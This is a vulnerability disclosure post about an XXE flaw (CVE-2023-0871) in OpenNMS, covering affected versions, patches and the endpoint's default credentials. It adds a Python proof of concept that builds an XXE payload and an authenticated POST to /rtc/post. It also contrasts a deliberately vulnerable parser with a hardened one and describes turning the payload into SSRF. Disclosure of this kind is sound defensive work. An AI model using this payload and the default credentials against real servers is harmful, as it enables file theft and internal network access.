During recent security research, disclosed in August, we discovered an XML external entity (XXE) injection vulnerability in OpenNMS using Synopsys Seeker, an interactive application security testing (IAST) tool.
An XXE vulnerability of this kind can be exploited by a threat actor sending a malicious HTTP request to an HTTP endpoint exposed by OpenNMS. This blog post walks through the root cause analysis of the XXE bug, how an attacker could exploit it, and the patches applied by the maintainers.
OpenNMS is a Java-based open source network monitoring platform. It monitors some of the largest networks in the Fortune 500, covering the healthcare, technology, energy, finance, government, education, retail, and industrial sectors, many with tens of thousands of networked devices.
OpenNMS comes in two open source distributions, Horizon (the community release) and Meridian (the enterprise release), both under the AGPLv3 license. Additional components extend the platform with distributed network monitoring (Minion), scalability (Sentinel), and scalable data persistence (Newts). OpenNMS is a high-value target because it lets a system administrator monitor servers and services, which in some cases requires the platform to hold credentials for those servers and services. An attacker who gained access to the credentials of a monitored service or server could use them to move laterally and spread to other network hosts and networks.
CVE-2023-0871 affects OpenNMS Horizon 31.0.8 and versions earlier than 32.0.2. The fix is to upgrade to Meridian 2023.1.6, 2022.1.19, 2021.1.30, 2020.1.38, or to Horizon 32.0.2 or newer; as a compensating mitigation, do not expose OpenNMS to the internet.
Exploitation requires a single HTTP POST request to the /rtc/post endpoint, which is protected by HTTP basic authentication. However, OpenNMS ships with default credentials for this endpoint (username and password both "rtc"), so on an installation that has not changed them the authentication is no real barrier, and the XXE could be used to perform a server-side request forgery (SSRF) attack from the server's network position.
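To make the exploitation path concrete, here is an added example that is not code from this post or from the OpenNMS project. It builds an XXE body of the shape an attacker would POST, attaches the default rtc:rtc basic-auth header (the request is constructed but never sent), and then runs the same payload through two parsers: one that fetches and inlines external entities, which is how an unhardened XML parser in a Java application typically behaves by default, and one that keeps external entity resolution off and refuses any DOCTYPE. Python's xml.sax stands in for the Java parser here; in Python the unsafe behaviour has to be switched on explicitly, which is exactly the line marked as the bug. The host, port, `/opennms` prefix, `Content-Type` header, the secret file and the internal URL are all assumed or constructed for the demonstration.

```python
"""Hypothetical XXE walkthrough (not OpenNMS code): payload construction,
the authenticated request, and a vulnerable parser beside a hardened one.
Only the file:// case is executed; the HTTP request is built, never sent."""
import base64
import io
import pathlib
import tempfile
import urllib.request
import xml.sax
import xml.sax.handler


def build_xxe_payload(entity_uri: str, root: str = "data") -> bytes:
    """Classic XXE body: an external general entity whose content is inlined
    into the document. entity_uri may be file:///... (local file read) or
    http://internal-host/... (SSRF from the server's network position)."""
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE {root} [ <!ENTITY xxe SYSTEM "{entity_uri}"> ]>\n'
        f"<{root}>&xxe;</{root}>\n"
    ).encode()


def build_rtc_request(base_url: str, body: bytes,
                      username: str = "rtc", password: str = "rtc") -> urllib.request.Request:
    """POST to /rtc/post with HTTP basic auth. The defaults are the credentials
    the post describes as shipping with OpenNMS; the request is returned, not sent."""
    token = base64.b64encode(f"{username}:{password}".encode()).decode()
    return urllib.request.Request(
        base_url.rstrip("/") + "/rtc/post",
        data=body,
        method="POST",
        headers={"Content-Type": "application/xml",  # assumed content type
                 "Authorization": "Basic " + token},
    )


class _TextCollector(xml.sax.handler.ContentHandler):
    """Collects character data; an expanded entity shows up here."""
    def __init__(self):
        super().__init__()
        self.parts = []

    def characters(self, content):
        self.parts.append(content)


class _RejectDoctype:
    """SAX lexical handler that aborts on any DOCTYPE, which is where entity
    declarations (and therefore XXE) live."""
    def startDTD(self, name, public_id, system_id):
        raise ValueError(f"DOCTYPE '{name}' rejected")
    def endDTD(self): pass
    def comment(self, content): pass
    def startCDATA(self): pass
    def endCDATA(self): pass


def parse_vulnerable(xml_bytes: bytes) -> str:
    """External general entities are fetched and inlined into the document."""
    collector = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(xml.sax.handler.feature_external_ges, True)  # the bug
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def parse_hardened(xml_bytes: bytes) -> str:
    """Keeps external entity resolution off and refuses DTDs outright."""
    collector = _TextCollector()
    parser = xml.sax.make_parser()
    parser.setContentHandler(collector)
    parser.setFeature(xml.sax.handler.feature_external_ges, False)
    parser.setProperty(xml.sax.handler.property_lexical_handler, _RejectDoctype())
    parser.parse(io.BytesIO(xml_bytes))
    return "".join(collector.parts)


def run_demo() -> dict:
    """Constructed scenario: a secret file on the 'server', a payload pointing
    at it, and the two parsers side by side."""
    with tempfile.TemporaryDirectory() as workdir:
        secret = pathlib.Path(workdir) / "secret.txt"
        secret.write_text("s3cr3t-token")  # constructed sample data
        payload = build_xxe_payload(secret.as_uri())
        # Assumed host, port and context path; nothing is sent.
        request = build_rtc_request("http://opennms.example:8980/opennms", payload)
        leaked = parse_vulnerable(payload)
        try:
            parse_hardened(payload)
            hardened = "parsed"
        except ValueError as err:
            hardened = str(err)
    return {"authorization": request.get_header("Authorization"),
            "leaked": leaked, "hardened": hardened}


if __name__ == "__main__":
    print(run_demo())
```

Swapping the `file://` URI for an internal `http://` URL (for example a constructed `http://10.0.0.5/admin`) turns the same payload into the SSRF the post describes: the server, not the attacker, makes the request, and whatever it fetches is inlined into the parsed document. Refusing the DOCTYPE up front is the more robust defence than disabling individual features, because it removes the entity declaration mechanism entirely.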